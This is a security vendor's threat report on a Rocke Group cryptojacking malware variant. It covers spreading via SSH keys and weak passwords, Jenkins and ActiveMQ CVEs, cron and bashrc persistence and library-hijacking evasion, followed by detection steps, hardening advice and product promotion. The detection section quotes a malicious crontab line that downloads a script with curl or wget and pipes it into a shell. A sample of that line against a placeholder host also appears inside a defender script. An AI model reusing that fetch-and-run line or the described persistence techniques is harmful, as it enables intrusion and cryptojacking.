New Malware Variant Exploits Production Environment
Rocke Group is a Chinese-based threat actor most known for running cryptojacking malware on Linux machines. The group has been active since 2018 and continues to evolve by modifying its tools and techniques to stay evasive. In 2019, we reported that Rocke Group was competing with Pacha Group for cryptomining positioning on Linux-based servers in the cloud.
We have found a new malware variant developed by Rocke Group, that infects other machines in the network using saved SSH keys and weak passwords. It also exploits vulnerabilities in popular platforms and services such as Jenkins, Redis and ActiveMQ. Once the victim is infected a Monero cryptominer is executed.
Below we present our findings with instructions on how to check if your system has been compromised, as well as how to protect your cloud environments against future Rocke Group attacks.
Capabilities and Findings
The malware that is initially delivered to the victim’s server is packed with a modified UPX which can make it harder for some Endpoint Detection and Response (EDR) products to detect the malicious code. This threat contains a number of modules that are stored in a compressed form inside the malware, and during the execution the payloads are extracted and executed.
Rocke Group uses a new script that downloads malware from a hosting server and executes it. The malware then uses public SSH keys, which are saved in a file called “known_hosts” on the victim’s Linux machine, to infect other machines on the network.
The malware achieves persistence using a scheduled task in crontab and bashrc files. It creates a service that controls the execution of the malware and configures it to be executed on startup. The payload of the service is extracted from within the Rocke Group sample.
Next, the malware attempts to spread in the network by brute forcing SSH, Redis and Jenkins with weak passwords. Then, it exploits vulnerabilities. For Jenkins it uses two code execution vulnerabilities (CVE-2018-1000861, CVE-2019-1003000) and for ActiveMQ it attempts an arbitrary file write (CVE-2016-3088).
To hide the activity of the malware, it implements an evasion technique that uses library hijacking. This way the information retrieved by system commands is altered in a way that hides resources used by the malware and its components. For instance, running the ‘top’ command will not show the high CPU usage caused by the cryptomining malware.
One of the compressed modules is an XMRig Miner. Before the miner is executed, the dropper kills any other process that uses more than 30% of the cloud server’s CPU, so that the cryptominer has all of the CPU to itself.
Detection and Response
Detect if a machine in your system has been compromised by following all of these steps:
- The malware creates files in the following directories:
Response: Remove the malicious files
MITRE Technique: Masquerading (T1036)
systemctl stop [servicename]
systemctl disable [servicename]
systemctl daemon-reload
systemctl reset-failed
*/15 * * * * (curl -fsSL -m180 ||wget -q -T180 -O- )|sh
Check the following location of scheduled jobs:
MITRE Technique: Scheduled Task/Job (T1053)
MITRE Technique: Event Triggered Execution using .bashrc file (T1546)
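The two checks below are an added example for defenders and are not part of the original post: one flags crontab entries that pipe a curl/wget download straight into a shell, the scheduled task pattern shown above; the other lists libraries registered in a preload file, the mechanism library hijacking relies on to alter what commands such as top report. The sample crontab, the URLs in it and the library path are constructed placeholders.

```shell
#!/bin/sh
# Added example, not part of the original post: two defender checks for the
# persistence and evasion behaviour described above. One flags crontab entries
# that pipe a curl/wget download straight into a shell; the other lists libraries
# registered in a preload file, the mechanism library hijacking relies on to
# alter what commands such as top report.

# Print the lines of a crontab-format file that pipe a curl/wget download into sh.
suspicious_cron_lines() {
  grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)' "$1" || true
}

# Count those lines; prints 0 for a clean file.
count_suspicious_cron() {
  suspicious_cron_lines "$1" | grep -c . || true
}

# Print the non-comment, non-empty entries of an ld.so.preload-style file.
# On a clean host /etc/ld.so.preload is normally absent or empty.
preload_entries() {
  [ -r "$1" ] || return 0
  grep -Ev '^[[:space:]]*(#|$)' "$1" || true
}

count_preload_entries() {
  preload_entries "$1" | grep -c . || true
}

# Constructed sample inputs (the URLs and the library path are placeholders).
SAMPLE_CRON=$(mktemp)
cat > "$SAMPLE_CRON" <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/15 * * * * (curl -fsSL -m180 http://PLACEHOLDER.example/x.sh||wget -q -T180 -O- http://PLACEHOLDER.example/x.sh)|sh
EOF
SAMPLE_PRELOAD=$(mktemp)
printf '%s\n' '# constructed sample preload file' '/usr/local/lib/libplaceholder.so' > "$SAMPLE_PRELOAD"
trap 'rm -f "$SAMPLE_CRON" "$SAMPLE_PRELOAD"' EXIT

echo "suspicious cron entries: $(count_suspicious_cron "$SAMPLE_CRON")"
suspicious_cron_lines "$SAMPLE_CRON"
echo "preload entries: $(count_preload_entries "$SAMPLE_PRELOAD")"
preload_entries "$SAMPLE_PRELOAD"
```

On a real host, point the functions at /etc/crontab, each file under /etc/cron.d, the saved output of `crontab -l` for every user, and /etc/ld.so.preload.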
- Use strong passwords for SSH, Jenkins and Redis services. It is also highly recommended to use TLS authentication.
- Use different passwords and authentication keys for each machine in the network.
- Make sure that your Jenkins and ActiveMQ services have the latest updates.
- Restrict access to services and machines, and give only the required permissions for each user.
- Filter network traffic to untrusted or known bad domains.
- Apply network anomaly detection to spot suspicious communication that deviates from the usual traffic.
Runtime Protection is a Must
This attack is sophisticated in that it implements evasion techniques, making detection much harder. It also spreads to other services and machines on the network, making it harder to respond to. Runtime protection with Intezer Protect gives you immediate visibility over all code running in your systems and alerts you whenever unauthorized code is executed. So, if Rocke Group attacks an environment with Intezer Protect installed on it, the user would immediately get an alert on all infected machines with the ability to terminate the malicious processes.
While there are dozens of cloud attack vectors that threat actors can utilize, such as software vulnerabilities and misconfigurations, eventually all attackers must run code or commands in the production environment to conduct any damage.
Consider that it’s not realistic to be able to close all attack vectors. Not only does it take time to fix vulnerabilities, but there are always attack vectors that are practically impossible to prevent such as supply chain or unknown vulnerabilities. Recent attacks have shown that Linux cryptominers and other threats will find their way into the production environment no matter how hard you work to reduce the attack surface. Runtime protection is a necessary last line of defense as actors like Rocke Group remain active.
How Can Intezer Help?
You will be notified as soon as malicious or unauthorized code is executed. In this case, execution of the script and the malware will trigger an alert. You can see the full process tree, know exactly which malicious processes were created by the malware, and be able to stop them. While the Rocke Group campaign uses advanced evasion techniques to hide the malware and its resources, with Intezer Protect you will see all of the information and activity that happens on your machine.
The way we detect threats is different from other solutions. Anomaly detection and behavioral profiling can fail to detect advanced attacks designed to look “normal.” We detect threat variants by recognizing even the slightest amount of malicious code reuse. This innovation has proven to be the fastest to identify attacks in Linux and containerized environments.
Most runtime solutions are based on behavioral profiling which generates high false positives and requires constant tweaking of rules and policies. Our core detection strategy is based on detecting unauthorized code instead of a set of rules. The result is very few false positives, and contextualized alerts indicating only real attacks.
We inspect any new code running in memory and analyze it against our cyber immune system of trusted and malicious code. This allows us to inspect every change in memory to see if it’s truly unrecognized or malicious code, or just a natural change such as a software upgrade. This analysis does not just give you a “good or bad” answer. It also provides a deep understanding about the threat, where it came from, and who is responsible, crucial for responding smarter and faster to incidents.
Try Intezer Protect for free on up to 10 hosts.
Domains Used to Download the Malware
Domains Used for Resolving the C2 Address